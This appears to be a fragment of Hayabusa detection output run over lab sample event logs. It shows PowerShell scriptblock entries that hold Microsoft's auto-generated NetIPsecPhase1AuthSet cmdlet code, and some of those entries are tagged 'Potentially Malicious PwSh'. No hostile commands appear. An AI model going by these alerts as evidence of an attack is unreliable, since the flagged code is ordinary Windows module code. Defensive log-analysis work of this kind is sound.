($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase1AuthSet' -Alias '*' function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and 
(@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase1AuthSet' -Alias '*' function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/stand",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"eptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 
'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase1AuthSet' -Alias '*' function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] 
[string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] 
[CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase1AuthSet' -Alias '*' function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/stand",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] 